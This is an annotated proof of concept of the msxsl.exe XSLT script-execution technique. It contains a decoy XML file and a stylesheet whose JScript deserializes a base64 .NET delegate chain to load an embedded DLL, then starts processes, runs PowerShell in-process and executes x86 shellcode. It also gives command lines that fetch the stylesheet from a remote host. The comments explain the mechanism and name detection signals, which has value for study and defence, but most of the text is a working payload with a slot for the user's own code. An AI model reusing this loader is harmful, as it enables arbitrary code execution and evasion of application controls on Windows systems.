MSXSL Universal Shellcode / PowerShell execution — proof of concept. msxsl.exe is made to run JScript embedded in an XSL stylesheet (an `msxsl:script` block); that script deserializes an embedded .NET delegate chain that calls Assembly.Load on a DLL carried inside the same stylesheet, then calls into that DLL to start a process, run PowerShell in-process, or execute raw x86 shellcode. The input XML below is a decoy; the stylesheet is the payload.
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<!--
  Benign-looking source document. Its content plays no part in the technique;
  it only gives msxsl.exe something to transform.
  NOTE(review): the xml-stylesheet PI names script.xsl, while the command lines
  below pass report.xsl on the command line, so the PI is not what selects the
  stylesheet in those invocations. Whether msxsl.exe honours the PI at all
  (it has a separate option for that) is not established here; confirm.
-->
<customers>
<customer>
<name>John Smith</name>
<address>123 Elm St.</address>
<phone>(123) 456-7890</phone>
</customer>
<customer>
<name>Mary Jones</name>
<address>456 Oak Ave.</address>
<phone>(156) 789-0123</phone>
</customer>
</customers>
1. start /b msxsl.exe customers.xml report.xsl                      (source document and stylesheet both local)
2. start /b msxsl.exe http://example.com/customers.xml report.xsl   (source document fetched over plain HTTP)
3. start /b msxsl.exe customers.xml http://example.com/report.xsl   (stylesheet, i.e. the code that runs, fetched over plain HTTP)

In every case the code that executes is the `msxsl:script` block of the stylesheet; in case 3 a remote server controls it. For defenders: msxsl.exe making outbound HTTP requests, loading the .NET runtime (the script instantiates `System.*` classes through COM), or spawning child processes is not normal behaviour for a command-line XSLT tool and is the observable to alert on.
<?xml version='1.0'?>
<!--
  Security review: this stylesheet is not a transform in any useful sense.
  Its single template (match="/") calls user:xml(), a JScript function defined
  in the msxsl:script block below, so transforming ANY input document with
  this XSL runs that script with the privileges of the msxsl.exe process.
  Code execution from msxsl:script is a feature of the MSXML extension
  namespace, not a bug in msxsl.exe; treat script blocks in untrusted
  stylesheets exactly like untrusted executables.
-->
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
// Entry point, called from the template below as user:xml(.).
// All side effects happen inside the try block before the return:
// an embedded .NET object graph is deserialized, the resulting delegate is
// invoked, and methods on the object it produces are called (process start,
// in-process PowerShell, shellcode execution). The returned value, the XML
// text of the first node in nodelist, only makes the transform look normal.
function xml(nodelist) {
// Pins the CLR version the System.* COM objects below are created under by
// setting COMPLUS_Version in this process's environment. The value matches
// the runtime version stamped in the embedded DLL's metadata (v4.0.30319).
// Assigning through an indexed COM property like this is JScript/WSH-only
// syntax and will not parse as standard JavaScript.
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
// Deliberately discards error text. Every failure in the try block lands
// here, so a failed run and a successful run produce identical transform
// output.
function debug(s) {}
// Decodes base64 text into a System.IO.MemoryStream using .NET types reached
// through COM (ASCIIEncoding, FromBase64Transform). The decoded length is
// computed as (length / 4) * 3 rather than read from the result array; that
// is exact only for unpadded input, which holds for serialized_obj below
// (it ends in "CgsA", no '=' padding).
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
// Base64 of a BinaryFormatter object graph. Decoding the readable fragments
// shows what it contains, so the variable name need not be trusted:
//   - a System.DelegateSerializationHolder chain built around
//     System.Runtime.Remoting.Messaging.HeaderHandler, Delegate.DynamicInvoke
//     and System.Xml.Schema.XmlValueGetter (first lines of the blob);
//   - the bound target method "System.Reflection.Assembly Load(Byte[])"
//     (last lines of the blob);
//   - an embedded PE image ("MZ" header, "This program cannot be run in DOS
//     mode") whose metadata names universal.dll, TestClass, RunProcess,
//     RunPS, injectSC, VirtualProtect, kernel32.dll, GetDelegateForFunctionPointer,
//     Thread, and System.Management.Automation (RunspaceFactory, CreatePipeline).
// Net effect: Deserialize() yields a delegate that, when invoked, runs
// Assembly.Load on the DLL shipped inside this string. This is the generic
// "serialized delegate to Assembly.Load" bootstrap used to get managed code
// running from a scripting host; the DLL, not the script, holds the logic.
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABgAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAvY6bWQAAAAAA"+
"AAAA4AACIQsBCwAAEAAAAAYAAAAAAAA+LwAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA5C4A"+
"AFcAAAAAQAAAqAIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAABEDwAAACAAAAAQAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAqAIAAABA"+
"AAAABAAAABIAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAWAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAACAvAAAAAAAASAAAAAIABQD0IQAA8AwAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKgIoBQAACgAA"+
"AComAAMoBgAACiYqAAAAGzACALkAAAABAAARACgHAAAKAygIAAAKbwkAAAoKKAoAAAoLB28LAAAK"+
"AAdzDAAACgwHbw0AAAoNCW8OAAAKBm8PAAAKAAlvDgAACnIBAABwbxAAAAoACW8RAAAKEwQHbxIA"+
"AAoAcxMAAAoTBQARBG8UAAAKEwgrFREIbxUAAAoTBgARBREGbxYAAAomABEIbxcAAAoTCREJLd7e"+
"FBEIFP4BEwkRCS0IEQhvGAAACgDcABEFbxkAAApvGgAAChMHKwARByoAAAABEAAAAgBrACaRABQA"+
"AAAAHgIoBQAACio6AAJ7DQAABG8HAAAGACoAEzAEAI8AAAACAAARcwoAAAYTBQADKAgAAAoKBhko"+
"HAAACgsSASgdAAAKDAYWCAaOaSgeAAAKABYNCAaOaR9AEgMoBQAABiYRBQjQAwAAAigfAAAKKCAA"+
"AAp0AwAAAn0NAAAEEQX+BgsAAAZzIQAACnMiAAAKEwQRBBZvIwAACgARBBdvJAAACgARBG8lAAAK"+
"ABEEbyYAAAoAACoAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAApAQAACN+AAAQ"+
"BQAANAYAACNTdHJpbmdzAAAAAEQLAAAYAAAAI1VTAFwLAAAQAAAAI0dVSUQAAABsCwAAhAEAACNC"+
"bG9iAAAAAAAAAAIAAAFXHQIcCQIAAAD6JTMAFgAAAQAAACcAAAAFAAAADQAAAAsAAAAMAAAAKQAA"+
"AAsAAAAGAAAAAgAAAAEAAAACAAAAAQAAAAEAAAAEAAAAAwAAAAAACgABAAAAAAAGAEUAPgAGAEwA"+
"PgAGAF4APgAGAJkAPgAGAKYAPgAGAOsBzAEGADYCFgIGAFYCFgIGAH4CzAEKAKUCkgIGAL8CswIG"+
"ANQCPgAOADsDFAMOAEsDFAMOAGgD9wIOAHcDFAMOAI8DFAMSANsDvAMOAOgD9wIGAPcDswIGANsD"+
"vAMGACAEBQQGAGIETwQGAHcEPgAGAJQEPgAGAKAEPgAGAN4EzAEGAOcEzAEGAA0FzAEGABoFPgAG"+
"AB8FPgAGAEMFPgAGAHsFagUGAIcFagUGAI4FagUGAMUFzAEGAOUFzAEGAAcGzAEGABkGFgIAAAAA"+
"AQAAAAAAAQABAAEAEAAYAAAABQABAAEAAgEAACIAAAAJAAEABgACAQAAKgAAAA0AAQAKAAMBEACz"+
"BAAABQANAAoABgbKADUAVoDSADgAVoDgADgAVoDuADgAVoD9ADgAVoAMATgAVoAZATgAVoArATgA"+
"VoBCATgAVoBZATgAVoBkATgAVoBxATgABgDGBAcBUCAAAAAAhhhjAAoAAQBbIAAAAACGAGkADgAB"+
"AGggAAAAAIYAdAATAAIAWCEAAAAAhgB6AA4AAwAAAAAAgACRIIMAGAAEAAAAAAADAIYYYwAhAAgA"+
"AAAAAAMAxgGSAAoACgAAAAAAAwDGAbQAJwAKAAAAAAADAMYBwAAvAAwAQCEAAAAAhhhjAAoADQBI"+
"IQAAAACGAM8ECgANAAAAAQCDAQAAAQCIAQAAAQCPAQAAAQCfAQAAAgCpAQAAAwCwAQIABAC9AQAA"+
"AQD4AQAAAgD/AQAAAQAGAgAAAgD4AQAAAQAPAjEAYwAKADkAYwBzAEEAYwAKAEkAYwB4AAkAYwAK"+
"AFEArQKDAFkAyAKJAGEA3AKOAFkA7QKUAGkAVAOjAHEAYwMKAHkAYwCoAHEAgAOuAIEAoQOzAIkA"+
"rgMOAIkAuAMOAIEAkgC4AHEA8QMKAKEAYwAKAAwALgTIABQAPATYAKEASATdALkAbgTjAMEAgwQK"+
"AAkAiwTnAMkAmwTnANEAYwAKANkA9AQLAdkA+gQTAekAFQUXAfEAMQUgAekATAUnAQkBYwAhABEB"+
"YwAwAREBnQU3AREBrwV4ABEBrQIKABEBwAUKACEBYwAOACkBYwBMATkBYwAKAAgACAA8AAgADABB"+
"AAgAEABGAAgAFABLAAgAGABQAAgAHABVAAgAIABaAAgAJABfAAgAKABkAAgALABpAAgAMABuAC4A"+
"EwBcAS4AGwBlAUMAIwB9AGMAQwFTAYAA2wA8AKMASwE8AOsAPgHYBcEA0QBAAQsAgwABAASAAAAA"+
"AAAAAAAAAAAAAAAAAHQCAAAEAAAAAAAAAAAAAAABADUAAAAAAAQAAAAAAAAAAAAAAAEAPgAAAAAA"+
"AQAAAAAAAAAAAAAAmgD3AgAAAAACAAAAAAAAAAAAAAABADUAAAAAAAMAAgAEAAIABQACAAAAADxN"+
"b2R1bGU+AHVuaXZlcnNhbC5kbGwAVGVzdENsYXNzAEppZ2dsaW4AUHJvdGVjdGlvbgBtc2Nvcmxp"+
"YgBTeXN0ZW0AT2JqZWN0AE11bHRpY2FzdERlbGVnYXRlAEVudW0ALmN0b3IAUnVuUHJvY2VzcwBS"+
"dW5QUwBpbmplY3RTQwBWaXJ0dWFsUHJvdGVjdABJbnZva2UASUFzeW5jUmVzdWx0AEFzeW5jQ2Fs"+
"bGJhY2sAQmVnaW5JbnZva2UARW5kSW52b2tlAHZhbHVlX18AUEFHRV9OT0FDQ0VTUwBQQUdFX1JF"+
"QURPTkxZAFBBR0VfUkVBRFdSSVRFAFBBR0VfV1JJVEVDT1BZAFBBR0VfRVhFQ1VURQBQQUdFX0VY"+
"RUNVVEVfUkVBRABQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAFBBR0VfRVhFQ1VURV9XUklURUNPUFkA"+
"UEFHRV9HVUFSRABQQUdFX05PQ0FDSEUAUEFHRV9XUklURUNPTUJJTkUAcGF0aABzdGFnZXIAYmFz"+
"ZTY0U2hlbGxjb2RlAGxwQWRkcmVzcwBkd1NpemUAZmxOZXdQcm90ZWN0AGxwZmxPbGRQcm90ZWN0"+
"AFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBPdXRBdHRyaWJ1dGUAb2JqZWN0AG1ldGhv"+
"ZABjYWxsYmFjawByZXN1bHQAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxh"+
"dGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAHVu"+
"aXZlcnNhbABDb21WaXNpYmxlQXR0cmlidXRlAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFN0"+
"YXJ0AFN5c3RlbS5UZXh0AEVuY29kaW5nAGdldF9Vbmljb2RlAENvbnZlcnQARnJvbUJhc2U2NFN0"+
"cmluZwBHZXRTdHJpbmcAU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbgBTeXN0ZW0uTWFuYWdl"+
"bWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcwBSdW5zcGFjZUZhY3RvcnkAUnVuc3BhY2UAQ3JlYXRl"+
"UnVuc3BhY2UAT3BlbgBSdW5zcGFjZUludm9rZQBQaXBlbGluZQBDcmVhdGVQaXBlbGluZQBDb21t"+
"YW5kQ29sbGVjdGlvbgBnZXRfQ29tbWFuZHMAQWRkU2NyaXB0AEFkZABTeXN0ZW0uQ29sbGVjdGlv"+
"bnMuT2JqZWN0TW9kZWwAQ29sbGVjdGlvbmAxAFBTT2JqZWN0AENsb3NlAFN0cmluZ0J1aWxkZXIA"+
"U3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMASUVudW1lcmF0b3JgMQBHZXRFbnVtZXJhdG9yAGdl"+
"dF9DdXJyZW50AEFwcGVuZABTeXN0ZW0uQ29sbGVjdGlvbnMASUVudW1lcmF0b3IATW92ZU5leHQA"+
"SURpc3Bvc2FibGUARGlzcG9zZQBUb1N0cmluZwBTdHJpbmcAVHJpbQBNVEFUaHJlYWRBdHRyaWJ1"+
"dGUAPD5jX19EaXNwbGF5Q2xhc3MxAEZ1bmN0aW9uADxpbmplY3RTQz5iX18wAEdDSGFuZGxlAEdD"+
"SGFuZGxlVHlwZQBBbGxvYwBBZGRyT2ZQaW5uZWRPYmplY3QATWFyc2hhbABDb3B5AFR5cGUAUnVu"+
"dGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUARGVsZWdhdGUAR2V0RGVsZWdhdGVGb3JG"+
"dW5jdGlvblBvaW50ZXIAU3lzdGVtLlRocmVhZGluZwBUaHJlYWRTdGFydABUaHJlYWQAQXBhcnRt"+
"ZW50U3RhdGUAU2V0QXBhcnRtZW50U3RhdGUAc2V0X0lzQmFja2dyb3VuZABKb2luAERsbEltcG9y"+
"dEF0dHJpYnV0ZQBrZXJuZWwzMi5kbGwAVW5tYW5hZ2VkRnVuY3Rpb25Qb2ludGVyQXR0cmlidXRl"+
"AENhbGxpbmdDb252ZW50aW9uAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAAAVTwB1AHQALQBT"+
"AHQAcgBpAG4AZwABACCmQieA+V1HhiXsISsqFVkACLd6XFYZNOCJAyAAAQQgAQEOBCABDg4IAAQC"+
"GAkJEAkFIAIBHBgHIAISERIVHAUgAQESEQIGCAMGERAEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAA"+
"BCAAAAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABCABAQgEIAEBAgUBAAEAAAUAARIpDgQAABIt"+
"BQABHQUOBSABDh0FCDG/OFatNk41BAAAEjkFIAEBEjkEIAASQQQgABJFCCAAFRJJARJNBhUSVQES"+
"TQggABUSWQETAAYVElkBEk0EIAATAAUgARJRHAMgAAIDIAAOGwcKDhI5Ej0SQRUSVQESTRJREk0O"+
"FRJZARJNAgMGEgwHAAIRbRwRcQMgABgIAAQBHQUIGAgGAAESeRF9CAACEoCBGBJ5BiABARKAhQYg"+
"AQERgI0NBwYdBRFtGAkSgIkSFAYgAQERgJkIAQADAAAAAAAIAQAIAAAAAAAeAQABAFQCFldyYXBO"+
"b25FeGNlcHRpb25UaHJvd3MBDC8AAAAAAAAAAAAALi8AAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"ACAvAAAAAAAAAAAAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQ"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEA"+
"AQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAAVgBT"+
"AF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8A"+
"AAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAA"+
"ACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYA"+
"aQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABl"+
"AHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAA"+
"AAAwAC4AMAAuADAALgAwAAAAPAAOAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAAB1AG4AaQB2"+
"AGUAcgBzAGEAbAAuAGQAbABsAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAA"+
"IAAAAEQADgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAAB1AG4AaQB2AGUAcgBz"+
"AGEAbAAuAGQAbABsAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAA"+
"LgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAu"+
"ADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAACAAAAwAAABAPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVj"+
"dGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
// Name of the type instantiated from the loaded DLL; it appears verbatim in
// the DLL metadata decoded above.
var entry_class = 'TestClass';
try {
setversion();
var stm = base64ToStream(serialized_obj);
// BinaryFormatter.Deserialize is the trigger. On data from outside the file
// this would be a textbook deserialization-to-RCE sink; here the gadget
// payload simply travels with the script, so the sink is used on purpose.
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
// SurrogateSelector is read only to obtain a null that can be placed in the
// ArrayList; it becomes the single argument handed to the delegate below.
// NOTE(review): that reading of the idiom is inferred, not shown here; confirm.
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
// Invoking the deserialized delegate performs the Assembly.Load of the
// embedded DLL; CreateInstance then constructs TestClass from it. From here
// on, o is an object whose methods are implemented in that DLL.
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
// INSERT YOUR CODE HERE
// Test Cases
// Starts a child process. In process-creation telemetry the parent will be
// msxsl.exe, which is the cleanest detection signal on this page.
o.RunProcess("calc.exe");
//Execute PowerShell Commands
// The argument is base64 of a UTF-16LE string; it decodes to " (Get-Process) ".
// The DLL metadata references System.Management.Automation runspace and
// pipeline types, which suggests PowerShell is hosted inside msxsl.exe
// rather than launched as powershell.exe; do not rely on a powershell.exe
// process-start event to see this.
// NOTE(review): WScript is a Windows Script Host object; whether it exists
// when this runs under msxsl.exe is not established here. Confirm.
WScript.Echo(o.RunPS("IAAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwApACAA"));
// x86 Test Case - Calc
// Base64 of raw x86 shellcode; its trailing bytes decode to "calc.exe". The
// DLL's VirtualProtect / kernel32.dll / GetDelegateForFunctionPointer /
// Thread references suggest it is run in-process by making a pinned buffer
// executable and calling into it. x86 shellcode can only run in a 32-bit
// host process; confirm the bitness of the msxsl.exe being used.
o.injectSC("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu+AdKgpoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA==");
} catch (e) {
debug(e.message);
}
// Only now is anything returned to the transform: the XML text of the first
// node, i.e. the decoy output that makes the run look like a normal transform.
return nodelist.nextNode().xml;
}
</msxsl:script>
<xsl:template match="/">
<!-- The transform's sole output is whatever user:xml returns; every side
     effect of the script has already happened by the time it is emitted. -->
<xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>